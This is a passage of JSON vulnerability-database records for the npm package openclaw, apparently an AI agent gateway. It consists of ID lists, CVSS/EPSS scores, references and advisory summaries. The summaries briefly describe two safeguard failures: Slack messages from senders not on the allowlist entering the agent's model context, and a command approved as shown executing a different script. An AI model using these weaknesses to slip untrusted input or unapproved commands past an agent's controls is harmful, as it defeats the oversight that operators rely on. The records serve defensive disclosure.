ID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"v
ulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"v
ulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"v
ulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-5rp4-cwgh-gvwq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q38j-b9g9-8yar"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92825?format=json","vulnerability_id":"VCID-q6ne-sw1r-xkd1","summary":"OpenClaw: Slack thread context could include messages from non-allowlisted senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Slack thread starter and thread-history context fetched through the API was not filtered by the effective sender allowlist. Messages from non-allowlisted senders could still enter the agent context when an allowlisted user replied in the same thread.\n\n## Impact\n\nA Slack deployment that relied on sender allowlists could still feed non-allowlisted thread content into the model context through thread history. This was a sender-access-control bypass on Slack thread context, not a direct channel-auth bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ac5bc4fb37becc64a2ec314864cca1565e921f2d` — filter Slack thread context by the effective allowlist\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41358","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04402","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04376","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.0439","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41358"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.
1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41358","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41358"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context"},{"reference_url":"https://github.com/advisories/GHSA-qm77-8qjp-4vcm","reference_id":"GHSA-qm77-8qjp-4vcm","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qm77-8qjp-4vcm"}],"fixed_packages":[{"url":"http://publi
c2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"V
CID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41358","GHSA-qm77-8qjp-4vcm"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q6ne-sw1r-xkd1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89752?format=json","vulnerability_id":"VCID-q9jf-srt4-fbcg","summary":"OpenClaw: Zalo replay dedupe cache could suppress events across authenticated webhook targets\n## Summary\n\nBefore OpenClaw 2026.3.31, the Zalo webhook replay-dedupe cache was shared across authenticated webhook targets and keyed too 
broadly. In multi-account deployments, a replay seen on one account could suppress a legitimate event on another account if `event_name` and `message_id` matched.\n\n## Impact\n\nAn attacker who controlled one authenticated Zalo webhook path in a multi-account gateway deployment could cause silent message suppression on a different Zalo account sharing that gateway. This was an availability issue; it did not provide cross-account authentication or data access.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.19, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — scope webhook replay dedupe per target\n- `7cea7c29705b188b464cc9cdc107c275b94b2a72` — follow-up hardening to scope replay dedupe by path and account\n\n## Release Process Note\n\nThe initial fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains follow-up hardening for the same surface.\n\nThanks @nexrin for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v"},{"reference_url":"https://github.com/advisories/GHSA-fqrj-m88p-qf3v","reference_id":"GHSA-fqrj-m88p-qf3v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.c
om/advisories/GHSA-fqrj-m88p-qf3v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-
jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-
zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-fqrj-m88p-qf3v"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q9jf-srt4-fbcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50527?format=json","vulnerability_id":"VCID-qahm-7zt5-fqcg","summary":"OpenClaw's Node system.run approval hardening wrapper semantic drift can execute unintended local scripts\nIn `openclaw@2026.3.1`, node `system.run` approval-path hardening rewrote wrapper command argv in a way that changed execution semantics. A command shown/approved as a shell payload (for example `echo SAFE`) could execute a different local script when wrapper argv were rewritten.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29608","reference_id":"","reference_type":"","scores":[{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07491","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07513","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07505","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29608"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/P
R:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T16:09:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T16:09:30Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608","reference_id":"CVE-2026-29608","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608"},{"reference_url":"https://github.com/advisories/GHSA-h3rm-6x7g-882f","reference_id":"GHSA-h3rm-6x7g-882f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","sco